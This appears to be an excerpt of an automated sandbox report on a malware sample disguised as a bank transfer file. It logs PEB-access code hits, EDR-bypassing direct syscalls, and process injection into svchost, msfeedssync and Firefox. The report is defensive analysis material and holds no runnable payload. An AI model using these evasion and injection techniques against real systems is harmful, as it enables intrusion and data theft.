Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]	1_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]	1_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]	1_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804B00 mov eax, dword ptr fs:[00000030h]	1_2_03804B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]	1_2_03738BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]	1_2_03738BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]	1_2_03738BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375EBFC mov eax, dword ptr fs:[00000030h]	1_2_0375EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BCBF0 mov eax, dword ptr fs:[00000030h]	1_2_037BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DEBD0 mov eax, dword ptr fs:[00000030h]	1_2_037DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]	1_2_03750BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]	1_2_03750BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]	1_2_03750BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]	1_2_03730BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]	1_2_03730BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]	1_2_03730BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740BBE mov eax, dword ptr fs:[00000030h]	1_2_03740BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740BBE mov eax, dword ptr fs:[00000030h]	1_2_03740BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_037E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_037E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]	1_2_03802B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]	1_2_03802B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]	1_2_03802B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]	1_2_03802B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804A80 mov eax, dword ptr fs:[00000030h]	1_2_03804A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037ACA72 mov eax, dword ptr fs:[00000030h]	1_2_037ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037ACA72 mov eax, dword ptr fs:[00000030h]	1_2_037ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]	1_2_0376CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]	1_2_0376CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]	1_2_0376CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DEA60 mov eax, dword ptr fs:[00000030h]	1_2_037DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]	1_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]	1_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]	1_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]	1_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]	1_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]	1_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]	1_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740A5B mov eax, dword ptr fs:[00000030h]	1_2_03740A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740A5B mov eax, dword ptr fs:[00000030h]	1_2_03740A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03754A35 mov eax, dword ptr fs:[00000030h]	1_2_03754A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03754A35 mov eax, dword ptr fs:[00000030h]	1_2_03754A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376CA38 mov eax, dword ptr fs:[00000030h]	1_2_0376CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376CA24 mov eax, dword ptr fs:[00000030h]	1_2_0376CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375EA2E mov eax, dword ptr fs:[00000030h]	1_2_0375EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BCA11 mov eax, dword ptr fs:[00000030h]	1_2_037BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376AAEE mov eax, dword ptr fs:[00000030h]	1_2_0376AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376AAEE mov eax, dword ptr fs:[00000030h]	1_2_0376AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03730AD0 mov eax, dword ptr fs:[00000030h]	1_2_03730AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03764AD0 mov eax, dword ptr fs:[00000030h]	1_2_03764AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03764AD0 mov eax, dword ptr fs:[00000030h]	1_2_03764AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]	1_2_03786ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]	1_2_03786ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]	1_2_03786ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03738AA0 mov eax, dword ptr fs:[00000030h]	1_2_03738AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03738AA0 mov eax, dword ptr fs:[00000030h]	1_2_03738AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03786AA4 mov eax, dword ptr fs:[00000030h]	1_2_03786AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03768A90 mov edx, dword ptr fs:[00000030h]	1_2_03768A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D4978 mov eax, dword ptr fs:[00000030h]	1_2_037D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D4978 mov eax, dword ptr fs:[00000030h]	1_2_037D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BC97C mov eax, dword ptr fs:[00000030h]	1_2_037BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]	1_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]	1_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]	1_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0377096E mov eax, dword ptr fs:[00000030h]	1_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0377096E mov edx, dword ptr fs:[00000030h]	1_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0377096E mov eax, dword ptr fs:[00000030h]	1_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B0946 mov eax, dword ptr fs:[00000030h]	1_2_037B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B892A mov eax, dword ptr fs:[00000030h]	1_2_037B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C892B mov eax, dword ptr fs:[00000030h]	1_2_037C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BC912 mov eax, dword ptr fs:[00000030h]	1_2_037BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03728918 mov eax, dword ptr fs:[00000030h]	1_2_03728918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03728918 mov eax, dword ptr fs:[00000030h]	1_2_03728918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE908 mov eax, dword ptr fs:[00000030h]	1_2_037AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE908 mov eax, dword ptr fs:[00000030h]	1_2_037AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037629F9 mov eax, dword ptr fs:[00000030h]	1_2_037629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037629F9 mov eax, dword ptr fs:[00000030h]	1_2_037629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BE9E0 mov eax, dword ptr fs:[00000030h]	1_2_037BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037649D0 mov eax, dword ptr fs:[00000030h]	1_2_037649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FA9D3 mov eax, dword ptr fs:[00000030h]	1_2_037FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C69C0 mov eax, dword ptr fs:[00000030h]	1_2_037C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804940 mov eax, dword ptr fs:[00000030h]	1_2_03804940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B89B3 mov esi, dword ptr fs:[00000030h]	1_2_037B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B89B3 mov eax, dword ptr fs:[00000030h]	1_2_037B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B89B3 mov eax, dword ptr fs:[00000030h]	1_2_037B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037309AD mov eax, dword ptr fs:[00000030h]	1_2_037309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037309AD mov eax, dword ptr fs:[00000030h]	1_2_037309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BE872 mov eax, dword ptr fs:[00000030h]	1_2_037BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BE872 mov eax, dword ptr fs:[00000030h]	1_2_037BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C6870 mov eax, dword ptr fs:[00000030h]	1_2_037C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C6870 mov eax, dword ptr fs:[00000030h]	1_2_037C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03760854 mov eax, dword ptr fs:[00000030h]	1_2_03760854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03734859 mov eax, dword ptr fs:[00000030h]	1_2_03734859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03734859 mov eax, dword ptr fs:[00000030h]	1_2_03734859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03742840 mov ecx, dword ptr fs:[00000030h]	1_2_03742840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]	1_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]	1_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]	1_2_03752835

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_006880A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_006880A9

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0065A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0065A155
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0065A124 SetUnhandledExceptionFilter,		0_2_0065A124

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtQuerySystemInformation: Direct from: 0x772748CC	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtQueryVolumeInformationFile: Direct from: 0x77272F2C	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtOpenSection: Direct from: 0x77272E0C	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtClose: Direct from: 0x77272B6C
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtReadVirtualMemory: Direct from: 0x77272E8C	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtCreateKey: Direct from: 0x77272C6C	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtSetInformationThread: Direct from: 0x77272B4C	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtQueryAttributesFile: Direct from: 0x77272E6C	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtAllocateVirtualMemory: Direct from: 0x772748EC	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtQueryInformationToken: Direct from: 0x77272CAC	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtTerminateThread: Direct from: 0x77272FCC	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtOpenKeyEx: Direct from: 0x77272B9C	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtDeviceIoControlFile: Direct from: 0x77272AEC	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtAllocateVirtualMemory: Direct from: 0x77272BEC	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtProtectVirtualMemory: Direct from: 0x77267B2E	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtCreateFile: Direct from: 0x77272FEC	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtOpenFile: Direct from: 0x77272DCC	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtWriteVirtualMemory: Direct from: 0x77272E3C	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtMapViewOfSection: Direct from: 0x77272D1C	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtResumeThread: Direct from: 0x772736AC	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtProtectVirtualMemory: Direct from: 0x77272F9C	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtSetInformationProcess: Direct from: 0x77272C5C	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtNotifyChangeKey: Direct from: 0x77273C2C	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtCreateMutant: Direct from: 0x772735CC	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtSetInformationThread: Direct from: 0x772663F9	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtQueryInformationProcess: Direct from: 0x77272C26	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtResumeThread: Direct from: 0x77272FBC	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtCreateUserProcess: Direct from: 0x7727371C	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtWriteVirtualMemory: Direct from: 0x7727490C	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtAllocateVirtualMemory: Direct from: 0x77273C9C	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtAllocateVirtualMemory: Direct from: 0x77272BFC	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtReadFile: Direct from: 0x77272ADC	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtQuerySystemInformation: Direct from: 0x77272DFC	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	NtDelayExecution: Direct from: 0x77272DDC	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msfeedssync.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: NULL target: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: NULL target: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\msfeedssync.exe

Thread register set: target process: 3316

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\msfeedssync.exe

Thread APC queued: target process: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2C92008

Jump to behavior

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_006887B1 LogonUserW,

0_2_006887B1

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_00633B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00633B3A

